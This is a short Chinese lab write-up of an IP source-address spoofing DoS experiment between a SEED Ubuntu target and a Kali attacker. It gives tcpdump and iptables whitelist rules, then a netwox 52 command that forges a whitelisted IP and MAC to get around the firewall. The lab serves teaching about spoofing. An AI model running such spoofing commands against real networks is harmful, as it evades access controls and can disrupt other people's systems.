一、IP源地址欺骗dos攻击
靶机: seed ubantu 12.04(发布者seed project)192.168.100.151
攻击机:kali linux 2.0(发布者 Offensive Security Ltd)192.168.40.132
1.在seed上开启tcpdump监听:tcpdump –i eth0 tcp port 80 -n –nn
2.在Seed节点上设置防火墙规则:
iptables -A INPUT -i eth0 -s 192.168.100.125/32 -j ACCEPT
iptables -A INPUT -i eth0 –s 192.168.100.1/32 -j ACCEPT
iptables -A INPUT -i eth0 -p all -j DROP
3 查看一下当前防火墙状态:iptables –L
在kali上利用netwox进行IP地址欺骗,伪装成192.168.100.125,突破防火墙限制,netwox 52 -E “0:1:2:3:4:5” -I “192.168.100.125” -e “00:0c:29:eb:98:60” -i “192.168.100.151”
在seed上分析,通过tcpdump可以看到seed向192.168.100.125返回了数据包,但实际上kali的ip是192.168.40.132;